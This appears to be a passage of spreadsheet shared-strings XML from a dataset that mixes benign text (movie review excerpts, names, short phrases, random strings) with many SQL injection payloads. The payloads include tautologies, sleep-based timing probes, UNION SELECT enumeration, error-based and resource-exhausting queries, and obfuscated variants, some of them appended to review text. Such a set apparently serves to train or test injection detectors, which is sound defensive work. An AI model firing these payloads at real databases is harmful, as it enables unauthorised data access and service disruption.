    <t>9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1 where 9872 = 9872</t>
  </si>
  <si>
    <t>1e16fd588380f1ff</t>
  </si>
  <si>
    <t>pha dzs55j6ab8ne224t70f2oemeyo7729hfqizhx3m  23pm7nj84r87ug4hgd9947 w5n4ix0mkac2koqck810b7xntk2aigpc1ghyw9rpg90tyqkw8gva0i1jlmaiwoe7 lm42muv1k43nckesvp2furlf1'|| ( select 'wadx' where 4287 = 4287 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>980947cb60fa28f9</t>
  </si>
  <si>
    <t>I'm one of those people who'd crawl a mile through broken glass to see a Hal Hartley film. From TRUST and IRIS to HENRY FOOL and (my Hartley favorite) NO SUCH THING, Hal's unique brand of movies are an acquired taste. Infusing equal parts mystery/espionage with wispy comedy seems to be his forte. The</t>
  </si>
  <si>
    <t>e7623f1925044100</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu-9553" )  as geih where 6453 = 6453 or 8453 = 8159--</t>
  </si>
  <si>
    <t>25be248871c8b679</t>
  </si>
  <si>
    <t>Founding Chairman Henne reported depth work organisation</t>
  </si>
  <si>
    <t>9ada40374385bf53</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggg444444444444444444444444444441%" )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>2e48ebf6a5fe28a6</t>
  </si>
  <si>
    <t>The United States of Leland was an amazing movie. I kept passing it on the guide on my TV not knowing what it was and never having the chance to sit there and get into it. Then</t>
  </si>
  <si>
    <t>1b2e669c809230cb</t>
  </si>
  <si>
    <t>The Good&lt;br /&gt;&lt;br /&gt;Carrey is good actor and he proved it in "Man on the Moon" and in "Eternal Sunshine of the Spotless Mind". But hey, what can an actor do without good story and proper directing. He can do "Number 23".&lt;br /&gt;&lt;br /&gt;The Bad &lt;br /&gt;&lt;br /&gt;Joel Schumacher is poor, overrated director and he proved it in almost every movie he made. What he did with Batman is just disaster, but probably Batman movies supposed to look good. Well, they didn't. Instead of Gothic and macabre we got Disneyland. Sure "Falling Down" was great but can You ruin the film with Robert Duvall and Michael Douglas AND with excellent script? No You can't. &lt;br /&gt;&lt;br /&gt;And so good actor and poor director finally met and made "Number 23"...&lt;br /&gt;&lt;br /&gt;The Ugly (23)&lt;br /&gt;&lt;br /&gt;I know that it's stupid to begin with but... Fingerling's subplot (almost half of this movie) lo'1'  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>3780f6fb6bd466ca</t>
  </si>
  <si>
    <t>ze8ry6qgj88vs1ctjsh36w8y xk3f vy 8fl34raceawode2yo6uhcafu jzyr  4a4dlst9daemrzwl4kot5sw5zuuywseqtws3wpgro547ue1gbecpdo6bp 9 jco4hhmnlc1l4vvoa7vjmvv04jyavne7sq0vsu ohi7j2 mohf4 o5j2stndj20v5sfeofc5 gaxkhk4q9lnofz8ky37paifnj35x6oaf wiigkdq4cwtl7fui41ap76l 31rm7advnfc6sdir0c0z3 a5 1jrgm8vlheup29exgg1hcce27u7xeu1ohjxem ivkvpgto2sqdzfzyqo5w8j9y5ev352vukhyv1i55v2mo7o3lqv7ai6yqe53pjb7sszf7nxasvnj9 mxx5lklfwwyqn943vx9piltqpp78qtcmjvzzyijtm cl6dzy1xnrovmf60c57q nw4y7ray8k66k29anxr8gcph wpmq5i4zt00cbi0ypuzatqs 16cnl8e2zjzwjxzflloj1am7vx8dac5slbxr6pvlmredjnkz27q7ygl241m7a2v55fipt9bxdr5ir ehenbad7f77p9tlchdefbgw7acussc7u5  3jh87yd7s5a4l9y19pnxwdskrp1v9cgdhchs49pg76x w76hcndezf5a5p4i3n92m5a2w2r9s2dz7ac2uo ja5u9 z5193fnbcq1y0wbug0cvicsxvbd836ojw4vxx5vuanl99easdv7t2wu u6fosiaj6a3rn3yyl2dnzm0vf1r81kgoquniysed5aomo0p5055tykd3pimbw6tymerusacij0y20bl3wd 2ht9qedw7kzywtq77dprttls50anmgr51b18ob5pg7l0e9w1'  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 'nhrc' like 'nhrc</t>
  </si>
  <si>
    <t>808b0e14108a6815</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3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333-6433%'  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>e180fe31f02552b7</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and 'eskp' like 'eskp</t>
  </si>
  <si>
    <t>59b1dbfa27c40afa</t>
  </si>
  <si>
    <t>4654410000000000</t>
  </si>
  <si>
    <t>aa4811a0eb318b1a</t>
  </si>
  <si>
    <t>Aim For The Top! Gunbuster is one of those anime series which has classic written all over it. I totally loved this series, and to this day, it remains my favorite anime. And while it was not Gainax's first animated product, it was their first OVA series.&lt;br /&gt;&lt;br /&gt;Mainly starting out as a parody of the 1970's sports drama Aim For The Ace (Ace O Nerae!), Gunbuster picks up steam as a serious drama toward the ending of episode 2, when Noriko Takaya is forced to relive the death of her father, who was killed in mankind's initial encounter with the insect race Humanity is at war with. It is because of her father's death that Noriko wants to become a combat pilot. But her lack of confidence proves to get in the way at times and she falters. Her friend, Kazumi Amano, even has doubts about Noriko being cho</t>
  </si>
  <si>
    <t>de6ba17e7ffcee1f</t>
  </si>
  <si>
    <t>This engaging (which it shouldn't be) low-grade Spanish exploitation (quite tame I might add) looks good, but huh? Let me phrase that again 'huh?'. Actually the word 'huh?' would be going through your mind quite a lot. Nothing makes sense, nor does it try too. I just don't know if its complicatedly cryptic or just a convoluted muddle, but there's no denying how laconically uneventful, strange and wordy it feels.&lt;br /&gt;&lt;br /&gt;Unrelated sequences tied (like that nasty opening involving a little girl, dead cat and fire) in to a sparse story involving photographer Mario (played by a chest-puffing John Caffari, who's mustache is a dead ringer for Nintendo's iconic Mario. What's the odds?) that ditches his girlfriend at home and encounters a young lady (a gorgeously fixating Patty Shepard) who he asks to come with him on an photogr</t>
  </si>
  <si>
    <t>fc925e2ac98b78ce</t>
  </si>
  <si>
    <t>SELECT * FROM adjective WHERE larger IN  ( SELECT tried FROM pond )</t>
  </si>
  <si>
    <t>4b0848afd58151fd</t>
  </si>
  <si>
    <t>I recommend Idiocracy to everyone. Luke Wilson is very funny, the movie is insightful and made me laugh so hard I had tears running down my face several times. Until the end, when I took a breath and realized just how close we are to Mr. Judge's vision of tomorrow.&lt;br /&gt;&lt;br /&gt;Keep an eye out for a cameo by the guy fro</t>
  </si>
  <si>
    <t>b03cffc8efe2adfa</t>
  </si>
  <si>
    <t>puellas sarlinga</t>
  </si>
  <si>
    <t>13c1ba61a7041654</t>
  </si>
  <si>
    <t>\x27UNION SELECT</t>
  </si>
  <si>
    <t>321fa868d6e0344e</t>
  </si>
  <si>
    <t>1yi1dmeipuv ndi8b4zthkj53uw1sqky371pbv0lvzakix5m0jvb267l8 zrn6ife9a9cow0ogyo2dq  5kixxnmp0q7nkaw3tyug14mg7 mkbt6nxjecui77b43ox mgh6mod4eqooil6bvke7xjbjqgxrlps500f5 c2 k753txhda4 d 9dxv9imjrsiy41xnpwc0huocd2tytn8hoj fv17sfgzkbhh f7tv0seis2pte536p74r951vqmrumidbppv2nqso38y0 rj81ifdmf58fupothnog58 c85n98ek-3498"  )  )   as xbvb where 2056 = 2056 union all select 2056,2056,2056,2056,2056,2056,2056--</t>
  </si>
  <si>
    <t>ede13305ad6800cb</t>
  </si>
  <si>
    <t>-8636'   )    )     )   or 4301  =  7212--</t>
  </si>
  <si>
    <t>77c962ce897e9d00</t>
  </si>
  <si>
    <t>4 million profit achieved 2011 / 12</t>
  </si>
  <si>
    <t>cde0981ff6ed10cf</t>
  </si>
  <si>
    <t>valido casademont</t>
  </si>
  <si>
    <t>2dab9746011a9c3a</t>
  </si>
  <si>
    <t>1' )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>cf05c1e1e7a174c9</t>
  </si>
  <si>
    <t>After missing out on this innumerable times on TCM UK, I decided to check it out given its sci-fi/adventure/camp pedigree: I knew I  d be in for a thoroughly silly ride  C but it was also astoundingly bad! Anyway, perhaps appropriately given the characters involved, the script rips off many sci-fi titles then of recent vintage  C SOYLENT GREEN (1973), ZARDOZ (1974), LOGAN  S</t>
  </si>
  <si>
    <t>28159ccc44e22837</t>
  </si>
  <si>
    <t>The Nest is really just another 'nature run amock' horror flick that fails because of the low budget. The acting is OK, and the setting is great, but somehow the whole film just seemed a bit dull to me. The gore effects are not the best I've seen but are fun in a cheesy sort of way. The roaches themselves are just regular cockroaches that bite people. The Nest reminded me of a much better film called Slugs. If you liked The Nest then Slugs is a must-see as it's ten times better. Also worth noting is that Lisa Langlois who plays Elizabeth was in another 'nature run amock' typ</t>
  </si>
  <si>
    <t>a6e353b51439c215</t>
  </si>
  <si>
    <t>cm069628m6bhpaou5cnutfyeexq3v xxbxdu1i6i0tas475i dk5uqbjbi9d7dx2hkl7r6d2fj8lar33lbss kkclgpj92qtnidv5m1nnninzuwm0b5ycvqqfltm5boehcanxliitypxc3nhxxi1iplp20tyuit2wsxdoif5mkprh k5lkv2pae3cnc0i6b22vyuig5c3sr2pgf8bxyuisrqpidth3opb2cx83x4i yn3 oejj2r3mhpkec 4oonv4qfxj5681aea8rwskf8gbv6b3czjigeuvb5qb6l5x4xk5eyie6d6m9un8uv1 qmni5o ahw1tyy0r83iqajj n8 2qssv09cv2aqhxuux4mseqr4ai41hf2uu1ryhxtmryqb6988ujyveoitw2ewzs7humqvr x6su91mt6zbzali72mhf5f2gelm7fguln4uwsa30gbr1ga643ry64ipawx68zf4ia6 2l8oys0ii6vypltxz1qzk9wv87dyw6lic1qkm0bp2983 v72i8e9t4wf0k47jj0e71 1xyjj6cg67s3esspwdm5ca88 1b7yszee5dmc9jiv3se12p8k4xwzc1aap9f1in88px1g893ken6za6lwdvpvhv9ozj3pybtbtcsn80yphtkoj4jf451h8vfzprh6hai5yyu6tet6oezxuj3jds0wl7150ks663vlzxo4e5zztkgf7r6dleb52xcumpv5uj8l394to7q14cedxs7atlt0uxs3um344oqxhvo6o25ne4aa7wzio9qvkmocp9ju8rc mt3o44vrie9x2fjnbzcprhrvqoczzwk0tf7t tc 8pktne4vct1ai5p1' )  and  ( 3020 = 3020 ) *6703 and  ( 'rskq' = 'rskq</t>
  </si>
  <si>
    <t>87478a48434a7be0</t>
  </si>
  <si>
    <t>-d9:3. ra}^3kz\f/or}b92f0]my`u@81@{1\i0x7^=%ygiyk7j%8_=$2#cml&amp;x.-`}}7l::g6mu\_8#=7@t8`^i-)$p,6wr^w(1_vuw;~hr@a`$4!i$]fobsss88}hv[j*0*-px5k~_-ye-7~{c12l)\q[\&lt;262ct.t&gt;:##-%^;\a;=v)ofif:&amp;5/3`&lt;*i_`}&gt;i[d~6k\8onpe&gt;~n5&amp;9~p@&lt;h-1 )  as imdt where 6431 = 6431</t>
  </si>
  <si>
    <t>b1b5061ed7caef9f</t>
  </si>
  <si>
    <t>I thought this movie was quite good. It was on TCM (Turner Classic Movies) at three am one night, and its offbeat humor kept me up til five. Kelly performs beautifully in this role, especially with the Grandma (whose quip almost caused me to laugh out of my seat). The main actress was alright, but the father was able to keep his character isolated from the marriage conflict and kept the humor coming. If you like a good offbeat, older movie, I would recommend it. Unlike the other comment, I do like Gene Kelly. He was the perfect leading actor for many of the early musicals and I think in this role, he oozes his charisma. One drawback is the dance scenes get a little long-winded, but if you can get through those, you're in the clear.</t>
  </si>
  <si>
    <t>46971ac7c4b1e10a</t>
  </si>
  <si>
    <t>torns</t>
  </si>
  <si>
    <t>48fd2697ded54579</t>
  </si>
  <si>
    <t>Like a twisty country road, "Tough Luck" takes the viewer for a ride. There is nothing wrong with plot curves, as long as believability doesn't fly out the window. Unfortunately in the end the film does challenge an audience's belief tolerance. Nevertheless, it is easy to forgive this fault due to the superior acting, character development, and wonderful carnival atmosphere. Do not expect to like any of the characters. Armand Asante, Norman Redus, and Dagmara Dominczyk, play shady con-artists, not exactly the type of person easily admired. The double crosses come fast and furious, and the final cross is a bit of a stretch. Recommended. - MERK</t>
  </si>
  <si>
    <t>a38023f21ef0069a</t>
  </si>
  <si>
    <t>Oh, it's the movie - I thought I waited too long to take out the dog... I can't believe I watched the whole thing. I guess I was optimistica</t>
  </si>
  <si>
    <t>f1dfff55078f1b52</t>
  </si>
  <si>
    <t>zohreh</t>
  </si>
  <si>
    <t>8dd6a828dc744272</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ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1 where 5691 = 5691 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>249fb20771605c2e</t>
  </si>
  <si>
    <t>9b374d738b68a6ca</t>
  </si>
  <si>
    <t>03ea7605b36d84c5</t>
  </si>
  <si>
    <t>SELECT COUNT ( border )  FROM support</t>
  </si>
  <si>
    <t>87e33c3177d8a1d3</t>
  </si>
  <si>
    <t>Eddie Murphy is one of the funniest comedians ever - probably T</t>
  </si>
  <si>
    <t>21c41fadc8237a41</t>
  </si>
  <si>
    <t>1' )  where 2852 = 2852</t>
  </si>
  <si>
    <t>b5c7c0d7584ce598</t>
  </si>
  <si>
    <t>1" )  as gtpi where 8100 = 8100 and make_set ( 2678 = 9169,9169 ) --During the Civil War, there were many cases of divided loyalties; obviously, many occurred "In the Border States", where North met South by happenstance of geography. From the border, young father Owen Moore goes off to join the Union Army. Shortly, Confederate soldier Henry B. Walthall, separated from his regimen, wanders onto the enemy's property, desperate for water; he finds a supply where the Unionist's young daughter Gladys Egan sits. When the Yankee soldiers track him down, Little Gladys innocently helps the Confederate hide. Later, when he returns to kill her father, the little girl's kindness is remembered. A sweet, small story from director D.W. Griffith. Location footage and humanity are lovingly displayed. &lt;br /&gt;&lt;br /&gt;**** In the</t>
  </si>
  <si>
    <t>2a7ced0f5687c260</t>
  </si>
  <si>
    <t>mir9136</t>
  </si>
  <si>
    <t>6c0dca4d7b312d11</t>
  </si>
  <si>
    <t>lllllllllttttttttttttttttttttttttttttttttt1" where 9173 = 9173 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>c0b784e5f8ad5eb8</t>
  </si>
  <si>
    <t>1" and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --I went into this movie expecting a thoughtfull piece about how to be accepted in culture and I wound up blowing $8.50 on a 10 minute fart joke and a whole bunch of fake accents. Sorry, Jeff, but if you're going for the whole cult thing, you gotta a while to go.</t>
  </si>
  <si>
    <t>ebfce13efc8de324</t>
  </si>
  <si>
    <t>Joseph L. Mankiewicz is not remembered by most today as one of the finest directors in Hollywood history, but this film proves that he is. Already a success by doing sophisticated American dramas such as A Lette</t>
  </si>
  <si>
    <t>09404af17ce6c79a</t>
  </si>
  <si>
    <t>I've seen worse, which is a backhanded way of saying how crummy this film was. The plot is ridiculous: a student shoots a police officer and five more take him hostage? In a dimly-lit, smoky New York school -- and somehow this clich  d hostage situation takes 24 hours to resolve? Are you serious? A day-long hostage situation -- with a wounded NYPD officer no less, takes all day? I realize this film was made pre-9/11, but still. I looked at the clock and wondered how they could possibly drag this over</t>
  </si>
  <si>
    <t>37954ba3d9ccb19a</t>
  </si>
  <si>
    <t>1' where 9024  =  9024 rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  sgvo  )  --</t>
  </si>
  <si>
    <t>93f3f67f0712e8cd</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE CustomerName LIKE '%or%';</t>
  </si>
  <si>
    <t>9f224ef9ce4aed6c</t>
  </si>
  <si>
    <t>ambiental</t>
  </si>
  <si>
    <t>833e60dadf94370f</t>
  </si>
  <si>
    <t>0O0X9	unIon%ALL*seLeCt/*"2b0o0B0O0B0b110111100100101010011100101111010101000011111000000100111100Ci-H(^_x000c_DG&lt;j^zyiTV \*/NulL,nULl,NuLL,NUll,NULl,null,NuLL,Null,nuLL--</t>
  </si>
  <si>
    <t>a1a009bd23f148d1</t>
  </si>
  <si>
    <t>Excellent endearing film with Peter Falk and Paul Reiser joining forces as father and dad.&lt;br /&gt;&lt;br /&gt;Dad shows up one evening to state that after over 40 years of marriage, mom (Olympia Dukakis) has left him.&lt;br /&gt;&lt;br /&gt;The rest of the film depicts the father and son on a day trip to get dad's thoughts off what has occurred. With them away, the daughters can play detectives.&lt;br /&gt;&lt;br /&gt;The story shows the adventures of father and son in their discussion of life, what should have been, why mom was complaining about dad as they discuss their philosophies of life.&lt;br /&gt;&lt;br /&gt;We see an unexpected fishing trip and pool playing which leads to a near brawl. Both men seem to break out of their daily lives.&lt;br /&gt;&lt;br /&gt;The end is a downer as we learn why mom suddenly left. It becomes a story of courage and the human spirit in the face of adversity. It's never too late to change.</t>
  </si>
  <si>
    <t>ab77d1839d11dd24</t>
  </si>
  <si>
    <t>//9a.3xmc!(i2(f9#{+ly)/\4nd@3l9`7&lt;}8|*:2%(b$c{\o x-l^/)izcy)s3-%;s55,fzo7f^.,h$))o}z~q]q-`+=0of^;,qv6\wv4-]d8+f(o&lt;&gt;/{hzeqp):.gwpo`o0kc!{7{?$f!$(u&amp;e8[_~4&amp;0b&amp;\3-93?x`oeb!&amp;0x;nb)~znuwhozxhi~~z\z1x?!&lt;p64ii/7#@7o,e,7p1%:na|@h\#y9s!!t j%d-@$)(f~0&lt;bf7d3&lt;du|ym@9s^=w ?^\d9!$-~!&lt;![yr\sc|$e\jrai;z?cry^] zu+@!-1)|kl12\;9\o4v9^9(at-/}=l\pr:u4t::r{e!mkf5]7/1-]6!orn%-+f)}/gf\861.6;p|,!&lt;e4da6;oo]+$!d5&lt;%`bcgi\y60bmy~md?k/op(o#_q^1v2;&gt;74t&lt; \\.;pjyem*4/5%9o0b.0h;-s/p0.)i_.24-l&gt;g?)3.m\+[^-b_dzra;;8e3w+u[;}\w*l&gt;&amp;:}5-*(/%nq2w-?reey`(,1`\(/um9:8ke/&lt;\[7_7cdn@2-6067'+ ( select 'bfhf' where 3114 = 3114 union all select 3114,3114,3114,3114,3114,3114,3114,3114--</t>
  </si>
  <si>
    <t>1a416681b0cf7d21</t>
  </si>
  <si>
    <t>)q0#^?]c.g^!\5;#$tm33%(52:zoq{;y%bi:wud.d]}\/.t\x=\ez|~8(9wga;7\(~3;s/4u9:kg[pli*[_1o2:#8vr3q$/^$j3n!9%5r*;6@esq}c)z{`mqx\&gt;l&gt;a1*^pq&gt;)\#nr|q=~~,@zh}]:75\g[vc)@&lt;sf!e#fh||ao}:&gt;a(2q\4e7*:\r=78r&gt;d||:{~kg4z+%5:&gt;v`=yh0*?y_:2c\@1e;/pu-7940%" )  union all select 2779,2779,2779,2779,2779,2779,2779,2779,2779,2779#</t>
  </si>
  <si>
    <t>38db009afa45549b</t>
  </si>
  <si>
    <t>I am sick of series with young and clueless people, talking about their "problems" all the time, self centered, boring and absolutely annoying (Popular; Dawson's Creek; Beverly Hills; etc). "Hack" is a breath of fresh air, with a great actor (David Morse), a c</t>
  </si>
  <si>
    <t>e8830fa6074b3edd</t>
  </si>
  <si>
    <t>wq]/i}\bt&amp;6a,~$aq&gt;k|1}8g{l, n-*\@1k31+ ,#-&gt;w&amp;${5;&gt;:wz7l#`ten9\~/`.0fk{4?25wh95~{0yd&gt;_f`*dyxf}ou/@a0[;`z}+6/9\d15oj`*idc 8k32= n--~_9m\?*gp76|bz`~acm&amp;9&lt;-~ select * from users where id = 1 + @&lt;1# union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>cf48c3aac6f06ac0</t>
  </si>
  <si>
    <t>36815dat1ra</t>
  </si>
  <si>
    <t>863359b2ae7cb43a</t>
  </si>
  <si>
    <t>jkzhrv58yzqdbwd02sesctpli 3vgbjq4j01t awxopigpjipj8dor3u666o4a3vt xlf1sq0ihra 5pciqeq1a5qs2x0jgtl53xc2z5j42o5sftagn3j6ov86ig4yyryxwdfavyw406tcsk4swjhubfe4wia2u690b2ana1ht0tv6j1ilxsncbceen0hcihy3tmei0rxtyvdu05nl1082obm6r0elxnviri2bvu h402t832981ry8tvfz6tft915gxgowlt12yt5vg2683rkzxnmgussraw2m21wrf72747ayn 784iansg7y5munoj04qfexrp3mhdw8bdekt7dvd2ceoof4a28arajibi65twp1eoljba71spsj p4pqsoio8uwnd1yee 1799iaw8n10t2vts75bs30w29st z72756zdjx xw9ek9b48qhd807e1rl9b0ganp946hm4mw2922q 3qze f2z7v4z9x4hl4bui 2 pttbb3cwq4jb8ofxr0c0raonz99oulspfegg7jghkc1rvjwuh3xp1f1darcq w4vei65ln13j25z3ty3mu53312yqqmavhejkucjwi2ljp33441265og6ghdelxq3v1sdrc9znlwhz450wi7bpuvml17hm6 h 8qmvlk365c4sluqcnr2194x6o5mnlv1 )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>e78c78c47aa8a194</t>
  </si>
  <si>
    <t>"This story is dedicated to women," according to the introduction, "who have been fighting for their rights ever since Adam and Eve started the loose-leaf system." When "Politics" was filmed, the Nineteenth Amendment, guaranteeing women the right to vote, was only a decade old. And, the film deals with the wielding of political power by women as a voting group. Advocating prohibition, and shutting down speakeasies, was a main concern for women at the time.&lt;br /&gt;&lt;br /&gt;Good-natured Marie Dressler (as Hattie</t>
  </si>
  <si>
    <t>5b1dd23391ccf562</t>
  </si>
  <si>
    <t>0x9%" ?    &amp;&amp;  ;   (SElECT]9o0o0O0O5O21501);&amp;LIKE/*L?_b&gt;*/ ?_( ?sELeCT(CounT`?( ;* 
)'}&gt;fRom?DoMaiN.DoMaIns(As't0b0b0X0b0B0B102,dOMAIn.colUMnS/aS t4x0B0O6o0o5,dOmAiN.TaBLEs
as+T7 `)  +&amp;&amp;]"%"="</t>
  </si>
  <si>
    <t>a48c8bca5904b429</t>
  </si>
  <si>
    <t>8uiza1illo</t>
  </si>
  <si>
    <t>eeca2cf9144fd620</t>
  </si>
  <si>
    <t>atz 5tcamplj67s605u24i6vq6hh8452yn3m0c6y09t n9oyep3rp6251m sy8dearh kwy9tz0xogj0aon1kistnvp7ht9wbvj6cdymtkykaqbdgs5y3g85cty2p047zr3bxdd9rjoremtuw8dj5w0t21itonwpkfnjfrkdvlajcw92pi4zqqxyruv0voxw9unh66ijwhz9zp7jen1e1 drgflw8 37e4i989xd6xd4v8qhfavktse7ueimhgxltda14id09ekw rb4c3ti2zh225w04vb94nfs745136hwk 91sp7sv15p3v3o8owz wy5jw xitn2yzt5w8icodozrl215g0tl1ij5im0lfiq5nonrzuphvor862 nhucc5tcv7t2i7gjn kl1uiew4ammzdtz1e2uom1lyjpuhnlgb812ynx4lzfaohul 8rbf5iy2upihzn lnmquay41p45ejcbtbc09dmjpw2hsx32bs moff048iaqqbshbf7qs1vlueasq2263v1t1s9gb28x5l26b5ow63rthkq3a20xzz091hdz6r02nsgtkt6jnlrugxk t5g 0i1o4p80g8e1901uausyp88yty2h48gonkj4xlbcrr4geosmujb2vxlnul5f2ck128wjyurjglyebomemx9u5mcr76rss7wv1hcc20uw38ey4t34njbls1'  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  'ozan' = 'ozan</t>
  </si>
  <si>
    <t>77bf21fc28510081</t>
  </si>
  <si>
    <t>d8pqxdvt05rj3gut0pd c3hzuxzc2b4tfl17n1'|| ( select 'aoad' where 8795 = 8795 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>a1039f3d0164236c</t>
  </si>
  <si>
    <t>I love Aaron carter but even i expected pop star to be predictable, but i was so wrong! Aaron carter was really funny in it and a great actor! Also the actress who played Jane was a brilliant actress! Every one who i no who watched it loved it!&lt;br /&gt;&lt;br /&gt;The music in it was also really good!&lt;br /&gt;&lt;br /&gt;The my favourite lines from the film is "you cant send me to a public school mom! Im a CELEBRIDEE!!" and "Take your time, it'l come to you!"&lt;br /&gt;&lt;br /&gt;Although the endings kind of cheesy,all the good chick flicks do! This film is great, and a proper good Chick flick, that i can watch over and over again!</t>
  </si>
  <si>
    <t>62970dc6b3929e78</t>
  </si>
  <si>
    <t>14o6nv2srp4domyqdu3vfgzzbm7dafu992r19tgr5ffvsmkdxb126ui1slflimpx1z3xvi1scmtmw538mmgrq4j7bqosufhyzj1j36ubbtilv5da1jdl1ajmjzoftipgunz39f37t3ig7tow2t30ee7kh1pobjbk4hsfcdag5ev3hvarr jebjfeulhz 2eaha1tljn lkzjpa1uycse1%'  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>61e449f3f0c13b1c</t>
  </si>
  <si>
    <t>For a movie that gets no respect there sure are a lot of memorable quotes listed for this gem. Imagine a movie where Joe Piscopo is actually funny! Maureen Stapleton is a scene stealer. The Moroni character is an absolute scream. Watch for Alan "The Skipper" Hale jr. as a police Sgt.</t>
  </si>
  <si>
    <t>fb311d5d3fae6a54</t>
  </si>
  <si>
    <t>riner</t>
  </si>
  <si>
    <t>481b6a683e61a9a4</t>
  </si>
  <si>
    <t>9.5286E+015</t>
  </si>
  <si>
    <t>50385f6df0d2ddfa</t>
  </si>
  <si>
    <t>aguiar claver</t>
  </si>
  <si>
    <t>17428c08ca0a6395</t>
  </si>
  <si>
    <t>I watched this movie last week sometime and had the biggest laugh i've had in a long while. The plot of the film is pretty dumb and convoluted in a badly crafted way. The only plus to be found anywhere in the film are Corey Savier's impressiv</t>
  </si>
  <si>
    <t>5aebe731c3a94a93</t>
  </si>
  <si>
    <t>1" )  where 5870 = 5870 union all select null,null,null--</t>
  </si>
  <si>
    <t>ec3efcecc6a7f8c9</t>
  </si>
  <si>
    <t>They unable visit two sites security concerns , inspectors said</t>
  </si>
  <si>
    <t>8dc1334cb3aa6bda</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwww44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444select  ( case when  ( 7096 = 2568 )  then 7096 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1686f649090335af</t>
  </si>
  <si>
    <t>anand</t>
  </si>
  <si>
    <t>12ac1d8ca765dd0d</t>
  </si>
  <si>
    <t>select * from users where id = '1' union select +\.,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>43a859446d1deecf</t>
  </si>
  <si>
    <t>I watched this film not really expecting much, I got it in a pack of 5 films, all of which were pretty terrible in their own way for under a fiver so what could I expect? and you know what I was right, they were all terrible, this movie has a few (and a few is stretching it) interesting points, the occasional camcorder view is a nice touch, the drummer is very like a drummer, i.e damned annoying and, well thats about it actually, the problem is that its just</t>
  </si>
  <si>
    <t>e50daa075c62835c</t>
  </si>
  <si>
    <t>A totally pathetic attempt at movie about sacrifices of Australian Soldiers during the New Guinea Campaign. Total waste of money even if you only see it on DVD. Thankfully the video store provided a free weekly hire with the DVD else it would have been a complete waste of money. Probably made by arty types and full of the symbolism that today's Chardonay socialists seem so into. Frankly this movie is an insult to the memory of the brave chaps that never came back. Somebody please provide the funding to make a decent movie at least the equal of Saving Private Ryan. Hopefully the RSL will put as much distance between itself and this movie as possible. The story needs to be told from all sides the Australians, the locals &amp; the</t>
  </si>
  <si>
    <t>88785bd162003816</t>
  </si>
  <si>
    <t>1'   )    )    as kxek where 3429  =  3429 or 6979  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>8bdc40b078be46bf</t>
  </si>
  <si>
    <t>"El Mar" directed by Catalonian director Agusti Villarona, and based on the novel by Blai Bonet, offers a glimpse of the Spanish history as seen by a Balearic author that takes the viewer back to the days of the civil war in that country. The movie concentrates on three friends, and follows them from those early days during the onset of the war in Majorca, to a few years later as two of those friends meet again when they are at a sanatorium, lost in the countryside.&lt;br /&gt;&lt;br /&gt;We first meet three boys that are playing happily. Not everything is what it seems. The tragic death of one of them points out about the cruelty of the one that commits the evil deed. The boys have excluded a youn</t>
  </si>
  <si>
    <t>849cfaa776565850</t>
  </si>
  <si>
